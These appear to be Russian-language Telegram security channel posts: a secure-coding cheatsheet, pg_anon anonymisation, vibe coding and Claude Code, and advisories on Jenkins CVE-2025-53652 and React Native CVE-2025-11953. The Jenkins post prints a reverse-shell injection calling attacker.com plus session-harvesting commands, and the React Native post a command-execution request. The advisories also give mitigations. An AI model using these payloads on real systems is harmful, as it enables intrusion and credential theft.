Secure Coding Cheatsheets
#appsec #dev #devsecops #red_team #blue_team #SSDLC

Статья на тему безопасной разработки. В статье автор разобрал примеры уязвимостей в коде и как их избегать.

Кому полезен материал: appsec'арям, пентестерам, devsecops'ам и разрабам естественно

Также он показывает примеры не на одном языке, а на:
➡️ C#(.Net)
➡️ PHP
➡️ Go
➡️ Python
➡️ Java
➡️ Android Java
➡️ iOS Swift

Полезно почитать всем, по факту он выбрал самые популярные технологически стеки.
Автор разобрал следующие уязвимости:
➡️ Broken Access Control (Небезопасная управление доступом)
➡️ Cryptographic Failures (Криптографические недостатки)
➡️ Injection (Инъекции)
➡️ Insecure Design (Небезопасный дизайн проектирования)
➡️ Security Misconfiguration (Небезопасная настройка чего либо)
➡️ Vulnerable and Outdated Components (Уязвимые и/или не обновленные компоненты)
➡️ Inadequate Supply Chain Security (Уязвимость в цепочке поставок)
➡️ Insecure Authentication/Authorization (Небезопасная аутентификация/авторизация)
➡️ Insufficient Input/Output Validation (Недостаточная фильтрация ввода/вывода)
➡️ Insecure Communication (Небезопасная передача информации)
➡️ Improper Credential Usage (Неправильное хранение учетных данных)
➡️ Inadequate Privacy Controls (Неправильный контроль конфиденциальности)

Каждый найдет для себя что-то)

➡️ Статеечка

🌚 @poxek

Ревизор приехал: pg_anon проверяет, всё ли скрыто
#psql #Postgresql #pg #dev

В современном мире, где данные становятся новой нефтью, разработчики часто сталкиваются с дилеммой: как тестировать приложения на реальных данных, не подвергая риску конфиденциальную информацию пользователей? Использование продакшн-данных в тестовых средах без должной анонимизации может привести к серьёзным утечкам и, как следствие, к многомиллионным штрафам и потере репутации компании.

Здесь на помощь приходит инструмент pg_anon — решение для анонимизации данных в PostgreSQL. С его помощью можно маскировать персональные данные, сохраняя при этом структуру и целостность информации. Это особенно важно для разработчиков и тестировщиков, которым нужны реалистичные данные для работы без риска нарушения конфиденциальности.

В статье подробно рассматриваются примеры конфигураций pg_anon и приводится пошаговое руководство по его внедрению в процессы разработки. Автор, опираясь на 15-летний опыт работы с данными в крупных проектах, подчёркивает, что безопасность данных — это не препятствие для работы, а залог спокойствия и стабильности бизнеса.

Для разработчиков, стремящихся обеспечить безопасность данных и соответствие современным стандартам защиты информации, внедрение таких инструментов, как pg_anon, становится не просто рекомендацией, а необходимостью.

➡️Читать далее

🌚 @poxek | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

⚡️ Vibe coding: хайп или революция в разработке? ⚡️
#videcoding #coding #разработка #dev #developer #cursor #windsurf #copilot

Недавно один хороший знакомый начал спрашивать тут и тут про вайбкодинг 🕺, что это, зачем оно и как вкатиться. Я ему в голосовой описал в двух словах, что это, как это. Но показалось, что можно рассказать про это подробнее на канале, раз я тоже один из таких "вкатунов"))

Собственно мой активный путь в "вайб кодинге"... всё ещё не привычно говорить столько зумерских слов в одном предложении... Начался с поста от Омара про то, что ты динозавр если ещё не используешь активно ИИ, я до этого пользовался ChatGPT, Claude чуть туда сюда, но не полноценными IDE с ИИ. А так как я прислушиваюсь к старшим коллегам, решил что тоже пора пробовать. Пробовал разные среды, расширения, плагины, сервисы и т.д. Потратил на все тесты более 300$ точно.

📌В итоге пришёл к своему идеалу: Cursor IDE с платной подпиской (вам может хватить и бесплатного тарифа, если вы не кодите на постоянке) и модели от Claude: Sonnet 3.7 для доработки фич и Sonnet 3.7 Thinking для планирования хода разработки, проектирования и собственно создания фич с нуля.

🔗Для тех кому интересно узнать больше о том, как vibe coding появился. Советы от меня при разработке, почекать сравнительную таблица инструментов для вайб кодинга, то велком читать статью в блоге

🌚 @poxek | 🌚 blog.poxek.cc | 📺 YT | 📺 RT | 📺 VK | 🌚 Магазин мерча

How Anthropic teams use Claude Code
#Anthropic #Claude #vibecoding #coding #dev #ai #ии

PDFка от Anthropic, где они делятся своим опытом использования Claude Code для разработки, безопасности, API и т.д. Это не читшит/гайд с промптами или как правильно, а как не правильно. В каждой теме команда приводит пример последотельности мыслей/действий и топ советов, как использовать Claude Code под конкретную задачу

Оглавление:
Claude Code for data infrastructure
Claude Code for product development
Claude Code for security engineering
Claude Code for inference
Claude Code for data science and visualization
Claude Code for API
Claude Code for growth marketing
Claude Code for product design
Claude Code for RL engineering
Claude Code for legal

🔗pdf прикреплена к посту

🌚 @poxek | 🌚 Блог | 📺 YT | 📺 RT | 📺 VK

CVE-2025-53652: Jenkins под ударом через Git Parameter
#jenkins #devops #dev #git

Command injection в популярном Jenkins Git Parameter Plugin ставит под угрозу DevOps инфраструктуру тысяч организаций. Несмотря на официальную оценку "Medium", исследователи VulnCheck доказали возможность удаленного выполнения кода и компрометации CI/CD пайплайнов.

🪲Суть уязвимости

Git Parameter Plugin не валидирует параметры, передаваемые в build-процессы. Плагин принимает произвольные значения вместо проверки соответствия предложенным вариантам, что позволяет инъекцию команд через Git-параметры.

Затронутые версии: 439.vb_0e46ca_14534 и ранее
Исправлено в: 444.vca_b_84d3703c2

#️⃣Техническая механика атаки

➡️Цепочка эксплуатации

# Нормальный параметр
BRANCH_PARAM = "master"
# Выполняется: git rev-parse --resolve-git-dir /path/master/.git

# Вредоносный параметр
BRANCH_PARAM = "$(sleep 80)"  
# Выполняется: git rev-parse --resolve-git-dir /path/$(sleep 80)/.git
# Результат: команда sleep выполняется как дочерний процесс

Плагин встраивает пользовательский ввод напрямую в shell-команды без валидации. Git как GTFObin предоставляет множество способов выполнения команд, делая cmd injection особенно опасной.

➡️Практический эксплойт

# Reverse shell через curl
curl -kv 'http://jenkins:8080/job/buildName/build' -X POST \
  -H 'Cookie: [cookie]' \
  --data-urlencode 'Jenkins-Crumb=[crumb]' \
  --data-urlencode 'json={"parameter":{"name":"BRANCH_PARAM","value":"$(bash -c \"bash &> /dev/tcp/attacker.com/12700 <&1\")"}}'

❗️Масштаб проблемы

VulnCheck провел анализ интернет-экспозиции Jenkins:

| Категория              | Количество серверов | Риск|
|------------------------|---------------------|-------------|
| Требуют аутентификации | 100,000+            | Средний     |
| Открытая регистрация   | ~1,000              | Высокий     |
| Без аутентификации     | ~15,000             | Критический |

15,000 Jenkins-серверов полностью доступны без аутентификации, что делает RCE возможным "из коробки".

ℹ️Требования для эксплуатации

➡️Аутентифицированные атаки
- Права Item/Build на целевом проекте
- Знание имени build-задачи
- Валидная сессия и CSRF-токен

➡️Неаутентифицированные атаки
Даже на серверах без аутентификации требуется:
- Валидный session cookie
- Jenkins-Crumb (CSRF токен)
- Имя build-задачи

# Получение необходимых данных
curl -kv http://target:8080/ -o /dev/null  # Получить cookie
curl -kv http://target:8080/job/buildName/build -H 'Cookie: [cookie]' | grep "data-crumb-value="

❗️Реальное воздействие

➡️В случае успешного похека

# Результат эксплуатации
$ nc -lvnp 1270
Connection received on 172.18.0.3 55664
$ id
uid=1000(jenkins) gid=1000(jenkins) groups=1000(jenkins)

$ cat ~/secrets/master.key
05322ff531f1b52117bf013b2fe77b40dacbc56268d68b9e234216fe825a0073a5c8051181033f630e67c408d58c3ef631e18ba8b8e6722e64d3c1380518e89a91b4256c5c348febceb24ef32f144045ed422dfb4bdc840aca33814989e431aa00db6df7c403da38247324783811d46c6f3caa1f9b1b26d979fff4391249ca8a

➡️Потенциальные последствия
- Доступ к master.key — полная компрометация Jenkins
- Исходный код проектов — утечка интеллектуальной собственности
- Секреты CI/CD — credentials, API ключи, сертификаты
- Supply chain атаки — внедрение backdoor в артефакты
- Lateral movement — распространение по инфраструктуре

❗️Митигация и защита

➡️Немедленные действия
1. Обновление плагина до версии 444.vca_b_84d3703c2+
2. Проверка bypass-флага — убедиться, что не установлен:

   -Dnet.uaznia.lukanus.hudson.plugins.gitparameter.GitParameterDefinition.allowAnyParameterValue=true
   

3. Аудит конфигурации — отключить ненужные плагины

➡️Долгосрочная стратегия
- Принцип наименьших привилегий для build permissions
- Сетевая сегментация Jenkins от критических систем
- Мониторинг активности через SIEM/SOC
- Регулярные security assessments CI/CD инфраструктуры

Источники:
🔗 VulnCheck Analysis
🔗 Jenkins Security Advisory
🔗 CVE-2025-53652 NVD

🌚 @poxek | MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч

CVE-2025-11953 — unauth RCE из-за уязвимой зависимости в React Native
#CVE #RCE #PoC #developer #dev #metro #react #ReactNative

Metro Development Server, используемый в React Native CLI, по умолчанию слушает все сетевые интерфейсы (0.0.0.0), что делает его доступным из внешних сетей. В сервер встроен эндпоинт POST /open-url, который принимает JSON с полем url. Значение этого поля напрямую передаётся в функцию open(url) из npm-пакета open (версия 6.4.0), которая на Windows вызывает cmd.exe без экранирования аргументов, позволяя выполнить произвольные системные команды с полным контролем параметров, например, запуск calc.exe или создание файла htb-easy-lol.txt.

На Linux и macOS open вызывает команды xdg-open и open без использования shell, аргументы передаются как отдельные параметры, поэтому прямой command injection затруднен. Для полноценного удалённого выполнения команд на этих системах требуются дополнительные уязвимости или эксплуатация особенностей URI-схем, таких как запуск локальных файлов через file://.

Проблема связана с тем, что React Native CLI запускает Metro Development Server, который использует уязвимый open-пакет для обработки /open-url, открывая путь к удалённому выполнению кода в среде разработки. Это критично, так как dev-сервер в ряде случаев доступен из внешних сетей и обрабатывает команды без защиты. Признайтесь, делали же проекты на 5 минут и потом это висело месяц в проде?)

Уязвимый пакет: @react-native-community/cli-server-api и @react-native-community/cli
Уязвимые версии: 4.8.0 — 20.0.0-alpha.2
CVSS: 9.8

➡️Последовательность атаки
- Атакующий отправляет специально сформированный POST-запрос

POST /open-url HTTP/1.1
Host: vulnerable-dev-server:8081
Content-Type: application/json
Content-Length: <length>

{
  "url": "calc.exe"
}

- Metro сервер, доступный из внешней сети, принимает запрос.
- Введенные данные передаются в функцию open(), вызывающую системные команды без защиты.
- Атакующий получает возможность запускать произвольные команды — например, открыть calc.exe или создать файл pwned.txt.

Для проверки уязвимости можно использовать команды npm list @react-native-community/cli-server-api и убедиться в используемой версии.

➡️Рекомендации
- Срочно обновить пакеты до версии 20.0.0 или выше, где уязвимость исправлена.
- Если обновление невозможно, запускать Metro сервер с привязкой к localhost (npx react-native start --host 127.0.0.1), чтобы заблокировать доступ извне.
- Проводить аудит зависимостей и сканирование цепочек поставок (SBOM) для выявления уязвимых версий и подозрительных модулей.

🔗Источник

🌚 @poxek | 📲 MAX |🌚 Блог | 📺 YT | 📺 RT | 📺 VK | ❤️ Мерч